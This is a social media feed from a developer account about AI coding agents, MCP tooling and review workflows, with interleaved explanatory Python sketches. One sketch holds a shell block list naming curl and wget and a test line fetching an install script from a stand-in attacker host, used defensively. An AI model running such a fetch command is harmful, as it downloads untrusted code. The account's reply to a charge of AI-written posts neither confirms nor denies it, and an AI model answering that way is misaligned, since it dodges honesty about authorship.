Isaac
@Dever401
460 posts

Building things from scratch | AI tools & dev infra | Always shipping. Portfolio: https://t.co/fASmWbJhCl

localhost · Joined July 2025
31 Following · 50 Followers

Isaac @Dever401
AI interviews are so difficult 😭😂 You study algorithms, system design, product sense, debugging, and prompt strategy... then one question still makes your brain open 17 tabs at once.
0 replies · 0 reposts · 1 like · 21 views

Isaac @Dever401
@hadd49590 @nghoihin Typed graph context feels much more durable than dumping chat history into a prompt. The hard product problem is versioning the schema as team language changes without making every agent integration brittle.
2 replies · 0 reposts · 0 likes · 24 views

Ismail @hadd49590
@nghoihin Typed graph over team chat is a smart primitive. Most MCP tools treat context as a blob to inject; a typed graph lets agents reason about relationships rather than retrieving flat text. How do you handle schema drift as conversation patterns change?
1 reply · 0 reposts · 0 likes · 9 views

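Neither post shows what a versioned typed graph actually looks like, so here is a minimal sketch in Python. Every name in it (Node, ContextGraph, migrate, SCHEMA_VERSION) is invented for the example, not taken from any real MCP tool; the point is just that stamping a schema version on each node and migrating old records forward handles drift at read time instead of breaking every agent integration.

```python
# Hypothetical sketch: a typed graph context with a schema version on every
# node, so agents detect drift instead of silently misreading old data.
from dataclasses import dataclass, field

SCHEMA_VERSION = 2  # bumped whenever team language changes the node types

@dataclass
class Node:
    id: str
    type: str              # e.g. "decision", "blocker", "owner"
    props: dict
    schema_version: int = SCHEMA_VERSION

@dataclass
class Edge:
    src: str
    dst: str
    relation: str          # e.g. "blocks", "decided_by", "supersedes"

@dataclass
class ContextGraph:
    nodes: dict = field(default_factory=dict)
    edges: list = field(default_factory=list)

    def add(self, node: Node) -> None:
        # Migrate old nodes forward instead of breaking agent integrations.
        if node.schema_version < SCHEMA_VERSION:
            node = migrate(node)
        self.nodes[node.id] = node

def migrate(node: Node) -> Node:
    # Illustrative migration: v1 called these "ticket"; v2 renamed to "task".
    if node.type == "ticket":
        node.type = "task"
    node.schema_version = SCHEMA_VERSION
    return node

g = ContextGraph()
g.add(Node(id="n1", type="ticket", props={"title": "fix login"}, schema_version=1))
print(g.nodes["n1"].type)  # "task": migrated forward on insert
```
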
Ismail @hadd49590
Two protocols will define how AI agents communicate:
MCP (Anthropic): agents use TOOLS. One schema, any model.
A2A (Google): agents coordinate with AGENTS. Discover, delegate, get results.
They compose. This is the infrastructure layer the agentic era needed.
2 replies · 0 reposts · 3 likes · 79 views

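How the two layers compose is easy to show in miniature. The sketch below is illustrative Python, not the real MCP or A2A SDKs (McpTool, WorkerAgent, Coordinator are all invented names): an A2A-style coordinator discovers a capable agent and delegates, and that agent does its work through MCP-style typed tools.

```python
# Illustrative composition of the two layers described in the tweet:
# MCP-style tool calls at the bottom, A2A-style delegation on top.
class McpTool:
    """One schema, any model: a named tool with a callable behind it."""
    def __init__(self, name, fn):
        self.name, self.fn = name, fn

    def call(self, **kwargs):
        return self.fn(**kwargs)

class WorkerAgent:
    """Uses TOOLS (the MCP layer)."""
    def __init__(self, tools):
        self.tools = {t.name: t for t in tools}

    def handle(self, task):
        # A real agent would pick tools with a model; hardcoded for the sketch.
        return self.tools["search_code"].call(query=task)

class Coordinator:
    """Coordinates with AGENTS (the A2A layer): discover, delegate, collect."""
    def __init__(self, registry):
        self.registry = registry  # discovery: capability -> agent

    def delegate(self, capability, task):
        return self.registry[capability].handle(task)

worker = WorkerAgent([McpTool("search_code", lambda query: f"results for {query!r}")])
coordinator = Coordinator({"code_search": worker})
print(coordinator.delegate("code_search", "schema drift"))
```
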
Isaac @Dever401
@imog @HackingDave This is the part teams will have to operationalize: model routing by task type, MCP/API cost visibility, and a hard split between planning, execution, and verification. Otherwise agent workflows quietly become a huge bill.
0 replies · 0 reposts · 0 likes · 7 views

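A hedged sketch of what that operationalization could look like, with a hypothetical route() helper and placeholder prices (nothing here is a real API or real pricing): phases map to models, and every call is metered so the per-model spend stays visible.

```python
# Hypothetical router: plan/execute/verify phases map to different models,
# and every call is metered so the bill is visible per phase.
from collections import defaultdict

ROUTES = {"planning": "opus", "execution": "sonnet", "verification": "haiku"}
COST_PER_CALL = {"opus": 0.30, "sonnet": 0.06, "haiku": 0.01}  # placeholder $
spend = defaultdict(float)

def route(phase: str, prompt: str) -> str:
    model = ROUTES[phase]                 # hard split by task type
    spend[model] += COST_PER_CALL[model]  # cost visibility per model
    return f"[{model}] would handle: {prompt}"

print(route("planning", "break the migration into steps"))
print(route("execution", "apply step 1"))
print(route("verification", "run the checks"))
print(dict(spend))
```
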
imog @imog
@HackingDave GPT-5.5 is expensive for ITOps work. I've completely transitioned to managing our estate via MCP/API, and on a Teams plan ccusage pins me at $100-200/day. I'm mitigating by using Sonnet for execution and Opus for planning. Moving to API... They aren't ready for $100-200/day.
1 reply · 0 reposts · 2 likes · 83 views

Dave Kennedy @HackingDave
This is surprising to me: first, GPT 5.5 is a better model than Opus 4.7, and second, the granular enterprise controls you get in OpenAI are way better than the virtually non-existent administrative controls over at Anthropic.
Quoting Andrew Curran @AndrewCurran_
According to the new data from Ramp, Anthropic has passed OpenAI in business adoption for the first time. "Adoption of Anthropic rose 3.8% in April to 34.4% of businesses. OpenAI adoption fell 2.9% to 32.3%. Overall AI adoption rose 0.2 percentage points to 50.6%."
29 replies · 2 reposts · 60 likes · 12K views

Isaac @Dever401
@narghev @DanielSmidstrup Attaching the diff viewer to the same session that made the change is smart. The review question is rarely just "what changed?" It is "why did the agent think this change solved the task?"
1 reply · 0 reposts · 2 likes · 15 views

narghev @narghev
Sometimes... and I am currently working on a tool that helps with the times that I want/have to. It's still WIP but would love more eyes on it. It opens up a diff viewer attached to the same Claude session that wrote the code, to remove the step of copy-pasting the diff back to the session. github.com/narghev/askdiff
1 reply · 0 reposts · 1 like · 46 views

Daniel Smidstrup @DanielSmidstrup
Are you checking every line of code written by AI?
338 replies · 5 reposts · 223 likes · 23.5K views

Isaac @Dever401
@gman_ai Less pretty, more useful is the right trade here. For debugging agent work, a pipeline trace beats chat bubbles because it shows sequence, tool boundaries, and where the state actually changed.
0 replies · 0 reposts · 0 likes · 3 views

GMAN @gman_ai
2570fda: swapped out session viewer chat-bubbles for pipeline trace in GMAN UI. Less pretty, more useful. Debugging should be easier now.
1 reply · 0 reposts · 0 likes · 16 views

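What a pipeline trace buys over a transcript is easy to see with a toy record shape. TraceStep and its fields are invented for this sketch, not GMAN's actual format: each step logs sequence, the tool boundary, and a state diff, so the debugging view can filter to the steps where state actually changed.

```python
# Invented trace record: sequence + tool boundary + state diff per step.
from dataclasses import dataclass

@dataclass
class TraceStep:
    seq: int
    actor: str        # "model" or a tool name (the tool boundary)
    action: str
    state_diff: dict  # keys touched -> (before, after)

trace = [
    TraceStep(1, "model", "plan fix", {}),
    TraceStep(2, "tool:editor", "patch auth.py", {"auth.py": ("v1", "v2")}),
    TraceStep(3, "tool:pytest", "run tests", {"tests_passing": (False, True)}),
]

# The debugging view: only the steps where state actually changed.
for step in trace:
    if step.state_diff:
        print(step.seq, step.actor, step.state_diff)
```
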
Isaac @Dever401
@dhruv___anand This is the missing layer for multi-agent coding. Once sessions run across Codex, Claude Code, Cursor, and friends, the review surface matters as much as the agent: search, diffs, thinking blocks, and sub-agent traces all in one place.
1 reply · 0 reposts · 0 likes · 21 views

Dhruv Anand @dhruv___anand
Built a unified viewer for all your AI coding sessions: Claude Code, Cursor, Codex, OpenCode, Hermes, and more in one UI. Live updates · thread search · thinking blocks · sub-agents · Pretty mode with diff cards. npx agent-session-viewer github.com/dhruv-anand-ai… Try it out!
3 replies · 0 reposts · 2 likes · 97 views

Isaac @Dever401
AI coding agents do not need more mystery. They need receipts. Every useful run should leave:
- goal
- files changed
- checks run
- open risks
- why the next human should trust it
The future is not just better code generation. It is reviewable delegation.
0 replies · 0 reposts · 1 like · 20 views

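As a concrete shape, the receipt above fits in a dataclass. The field names follow the tweet's list; everything else (RunReceipt, the sample values) is invented for illustration.

```python
# The tweet's "receipt" as a concrete, machine-checkable record.
from dataclasses import dataclass, asdict
import json

@dataclass
class RunReceipt:
    goal: str
    files_changed: list
    checks_run: list
    open_risks: list
    why_trust_it: str

receipt = RunReceipt(
    goal="add retry logic to the webhook client",
    files_changed=["client.py", "test_client.py"],
    checks_run=["pytest -q (42 passed)", "mypy (clean)"],
    open_risks=["backoff ceiling untested against the real API"],
    why_trust_it="behavior covered by new tests; no public signatures changed",
)
print(json.dumps(asdict(receipt), indent=2))
```
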
Isaac @Dever401
@princedoesai This is the right security direction. Once agents can pull packages, call MCP tools, and edit repos, the governance layer has to sit in the workflow itself, not as a PDF policy downstream.
0 replies · 0 reposts · 1 like · 8 views

Prince does AI @princedoesai
🚨 Breaking News: Endor Labs launched AURI Agent Governance and Package Firewall on May 12 to secure AI coding agents and workstations.
The detail: Agent Governance monitors agents, models and MCP tools, while Package Firewall blocks risky packages before they reach agent workflows.
Better move: Treat coding agents like privileged dev environments. Watch shell commands. Test .env access. Compare MCP usage. Save audit trails. Block fresh suspect packages. Ignore agent speed without controls.
The bigger pattern: AI coding is becoming infrastructure. Security has to move into the agent run, not after the PR. endorlabs.com/learn/introduc…
1 reply · 0 reposts · 1 like · 48 views

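A minimal sketch of what "security in the agent run" can mean, assuming invented gate functions and thresholds (this is not the Endor Labs API): every shell command and package install passes a policy check, and every decision lands in an audit trail.

```python
# Invented policy gates sitting inside the agent run, not after the PR.
import shlex

BLOCKED_COMMANDS = {"curl", "wget"}   # watch shell commands
MIN_PACKAGE_AGE_DAYS = 14             # block fresh suspect packages
audit_log = []                        # save audit trails

def gate_shell(command: str) -> bool:
    binary = shlex.split(command)[0]
    allowed = binary not in BLOCKED_COMMANDS
    audit_log.append(("shell", command, allowed))
    return allowed

def gate_package(name: str, age_days: int) -> bool:
    allowed = age_days >= MIN_PACKAGE_AGE_DAYS
    audit_log.append(("package", name, allowed))
    return allowed

assert gate_shell("ls -la")
assert not gate_shell("curl http://evil.example/install.sh")
assert not gate_package("left-pad-ng", age_days=2)
print(audit_log)
```
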
Isaac @Dever401
@Ebasrai22 @Lovable Voice plus MCP is powerful when the tool boundary is clear. The best flow is usually: say the intent, let the agent touch the right system, then inspect a small diff or preview before anything gets too real.
0 replies · 0 reposts · 0 likes · 2 views

Ebrahim @Ebasrai22
/voice plus @Lovable MCP on Claude Code might be the best thing ever
1 reply · 0 reposts · 0 likes · 20 views

Isaac @Dever401
@andyhennie @adamsilverman This feels like the quiet version of agentic software that will actually stick: small local jobs, skills written around real pain points, and enough visibility that you can trust the automation without babysitting it.
0 replies · 0 reposts · 1 like · 33 views

Hennie @andyhennie
@adamsilverman All Hermes cron jobs running on my main machine, running skills written by Codex, after I voice-prompted my pain points.
2 replies · 0 reposts · 2 likes · 132 views

Adam Silverman (Hiring!) 🖇️ @adamsilverman
Anyone have a Mac mini that is running 24/7 doing something productive? Everyone I talk to has bought one and it is only used a few minutes a day when they ask basic questions to it.
55 replies · 2 reposts · 53 likes · 13.1K views

Isaac @Dever401
@jig_corp Appreciate it. Traceability is the part that turns AI work from a clever demo into something a team can actually operate: inputs, decisions, diffs, tests, and handoff notes all in one trail.
1 reply · 0 reposts · 1 like · 6 views

Jignesh @jig_corp
@Dever401 I love this focus: making AI workflows transparent and traceable is a game changer. Every step gets clearer, and shipping…
1 reply · 0 reposts · 1 like · 23 views

Jignesh @jig_corp
Hey founders and devs on X! Looking to connect with people building in:
🍽️ SaaS
🚀 Tech
📲 Automation
🧠 AI tools
📱 Product Development
🔥 Web Apps
💻 Devs
Drop what you're working on!!
49 replies · 0 reposts · 39 likes · 1.3K views

Isaac @Dever401
@Stephansmith456 Exactly. Build in public works when the receipts are visible: what shipped, what broke, what changed your mind, and what the next smallest bet is. Polished certainty is less useful than honest momentum.
0 replies · 0 reposts · 0 likes · 3 views

Stephane Tchoko @Stephansmith456
@Dever401 Exactly. People trust momentum more than perfection. The more transparent you are about what worked, what failed, what you learned, and what you're shipping next, the more real the journey feels. That's what actually makes Build in Public powerful.
1 reply · 0 reposts · 0 likes · 3 views

Stephane Tchoko @Stephansmith456
I failed 3 times trying to figure out Build in Public. The lesson? Stop overcomplicating. Keep it simple. Keep shipping.
3 replies · 0 reposts · 1 like · 42 views

Isaac @Dever401
@aniongithub Yes. The review layer needs deterministic anchors: test results, coverage deltas, lint/type status, repro steps, and changed-file risk. More prompting helps, but metrics are what keep the review from becoming vibes.
0 replies · 0 reposts · 0 likes · 0 views

aniongithub @aniongithub
@Dever401 Totally agree! And in my experience, a large part of keeping review quality stable is to have objective, reproducible metrics as part of the review, not just more AI prompting (as this is inherently stochastic) 🙌
1 reply · 0 reposts · 0 likes · 4 views

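Those anchors are mechanical enough to express as a gate. A sketch with invented field names and thresholds (none of this is a real CI API): the deterministic metrics decide pass/fail, and prompting is reserved for explaining the failures.

```python
# Invented review gate: reproducible metrics decide, prompting only explains.
def review_gate(metrics: dict) -> list:
    """Return the list of objective failures; empty means anchors are green."""
    failures = []
    if not metrics["tests_passed"]:
        failures.append("tests failing")
    if metrics["coverage_delta"] < 0:
        failures.append(f"coverage dropped {metrics['coverage_delta']:+.1%}")
    if metrics["type_errors"] > 0:
        failures.append(f"{metrics['type_errors']} type errors")
    if metrics["high_risk_files_changed"]:
        failures.append("touched high-risk files: needs human review")
    return failures

run = {
    "tests_passed": True,
    "coverage_delta": -0.021,  # coverage delta vs. main
    "type_errors": 0,
    "high_risk_files_changed": ["auth/session.py"],
}
print(review_gate(run))
```
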
Isaac @Dever401
Most AI coding demos are lying by omission. The hard part is not writing code. It is keeping context, tool state, and review quality stable across a long session. That is where agent workflows actually win or fail.
1 reply · 0 reposts · 4 likes · 27 views

Isaac @Dever401
The interesting test for Devin, Codex, and Claude Code is not just whether it can code. It is whether it can preserve project state, surface uncertainty, and hand back work a human can verify quickly.
0 replies · 0 reposts · 1 like · 27 views

Isaac @Dever401
@bettercallsalva @OpenAI Yes. The model gets the headline, but the durable work is the harness: permissions, evals, rollback, audit trails, and enough observability that a team can trust the output under pressure.
1 reply · 0 reposts · 0 likes · 9 views

Thiago Salvador @bettercallsalva
@Dever401 @OpenAI The org-ops shift is the real story. Models are commodity-ish now; the moat is permission scaffolding + audit trails. Every enterprise win I see has someone full-time building eval + rollback infra. Folks shipping models look small next to the folks shipping the harness.
1 reply · 0 reposts · 0 likes · 6 views

OpenAI @OpenAI
Today we're launching the OpenAI Deployment Company to help businesses build and deploy AI. It's majority-owned and controlled by OpenAI. It brings together 19 leading investment firms, consultancies, and system integrators to help organizations deploy frontier AI to production for business impact. openai.com/index/openai-l…
667 replies · 1.5K reposts · 11.4K likes · 7.8M views

Isaac @Dever401
@adriwtm @OpenAI It is strongest when each tab has a narrow job and the handoff names what changed. It still gets messy if the sessions invent their own theories, so I try to force them back to evidence and repro steps.
0 replies · 0 reposts · 0 likes · 3 views

adri @adriwtm
@Dever401 @OpenAI Totally. Work coordinator is the right framing. How's it doing with parallel tabs on a messy debugging session?
8 replies · 0 reposts · 0 likes · 7 views

Isaac @Dever401
@SuperFunicular @claudeai Exactly. The hard part is not generating another patch; it is knowing which session still has the latest mental model. I would love tools to make lineage and confidence obvious at a glance.
1 reply · 0 reposts · 0 likes · 2 views

Claude @claudeai
New in Claude Code: agent view. One list of all your sessions, available today as a research preview.
985 replies · 2.2K reposts · 28.8K likes · 5.7M views

Isaac @Dever401
@liuzhengyanshuo @FahimTajwar10 @askalphaxiv That is a great way to frame it. A handoff should preserve the original question, the evidence trail, and the reason each constraint mattered; otherwise the next model optimizes for a slightly different problem.
0 replies · 0 reposts · 0 likes · 13 views

Sean Liu @liuzhengyanshuo
@Dever401 @FahimTajwar10 @askalphaxiv The hidden cost is losing the question shape during the switch. Once the query gets rephrased a few times, the evidence trail starts drifting.
1 reply · 0 reposts · 0 likes · 14 views

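One way to keep the question shape from drifting is to make the handoff a record rather than a paraphrase. A sketch with an invented Handoff shape (none of this comes from the thread's tools): the verbatim question, the evidence trail, and the reason behind each constraint travel together to the next session.

```python
# Invented handoff record that pins the "question shape" across a switch.
from dataclasses import dataclass, field

@dataclass
class Handoff:
    original_question: str                           # verbatim, never a rephrase
    evidence: list = field(default_factory=list)     # (source, finding) pairs
    constraints: dict = field(default_factory=dict)  # constraint -> why it matters

h = Handoff(
    original_question="Why does checkout latency spike at 09:00 UTC?",
    evidence=[("grafana", "p99 jumps 4x at 09:00"), ("cron", "report job at 09:00")],
    constraints={"no schema changes": "migration freeze until Q3"},
)

def brief(h: Handoff) -> str:
    """What the next session receives, instead of a lossy paraphrase."""
    lines = [f"QUESTION (verbatim): {h.original_question}"]
    lines += [f"EVIDENCE [{src}]: {what}" for src, what in h.evidence]
    lines += [f"CONSTRAINT: {c} (because {why})" for c, why in h.constraints.items()]
    return "\n".join(lines)

print(brief(h))
```
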
Isaac @Dever401
@notmissing_ Fair critique, and I appreciate the directness. The goal is useful, specific replies that still sound like someone actually read the post. When it misses that, it is worth calling out.
0 replies · 0 reposts · 0 likes · 22 views

NotMissing @notmissing_
@Dever401 I mean that it was an AI-generated reply; I think you could work on making it sound more human. No hate, just giving my POV.
2 replies · 0 reposts · 0 likes · 9 views

NotMissing @notmissing_
Operators reading the Claude vs Codex debate: this isn't your decision to make. What matters is that the AI in your business uses whichever model fits each task, swaps when something better comes out, and never locks you into one provider's pricing or rate limits.
2 replies · 0 reposts · 6 likes · 191 views